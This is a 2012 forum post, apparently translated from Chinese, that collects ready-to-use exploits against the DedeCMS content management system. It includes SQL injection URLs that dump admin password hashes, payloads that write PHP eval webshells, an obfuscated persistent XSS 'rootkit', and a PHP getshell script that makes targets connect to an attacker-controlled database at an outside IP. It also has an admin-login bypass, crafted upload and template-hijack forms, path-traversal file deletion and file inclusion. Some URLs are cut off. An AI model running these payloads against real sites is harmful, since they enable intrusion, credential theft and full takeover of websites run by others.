
DedeCMS vulnerability summary

Posted on 2012-10-18 10:42:14 by the original poster (楼主)

Dedecms 5.6 RSS injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability

Register as a member and upload software (上传软件); in the local address (本地地址) field enter: a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This writes x.php with password xiao, a one-line shell (一句话) generated directly.

Dede 5.6 GBK SQL injection vulnerability

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7''
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar browsers block URL-borne XSS, so their XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; however you then visit either of the URLs below, our XSS fires.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (织梦) variable override getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com
www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// Getshell() returns only the first response line; "OK" past offset 12 means "HTTP/1.1 200 OK"
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
return "";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (straight into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you go straight into the site backend.

The precondition for this vulnerability is that the backend path must be obtained first.

Dedecms (织梦) tag remote file write vulnerability
Precondition: you must first prepare your own dede database and insert the data: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, publish an article and upload an image; then, in attachment management, replace the image with our specially crafted template. Say the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if image formats are restricted, prefix it with gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(this is the crafted part)
</div>

<!-- 表单操作区域 -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if it reports the edit succeeded, we have changed the template path.
3. Visit the edited article:
Assuming the article just edited has aid 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Build the form above; after the upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

Dedecms (织梦) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

Dedecms (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, leaving a 20-character MD5 value; to turn that into the 16-character MD5, drop 3 more characters from the front and 1 from the end.

Dedecms (织梦) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

Dedecms (织梦) select_soft_post.php uninitialised page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

Dedecms (织梦) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It relies on a MySQL numeric field overflow raising an error, combined with DEDECMS writing database error messages through PHP into a file whose header is not verified.
1. Visit the URL:

http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is displayed.

2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run test.html from dede.rar; note that the action address in the form is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the output from step 2 means the trojan file was uploaded successfully.

Dedecms (织梦) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*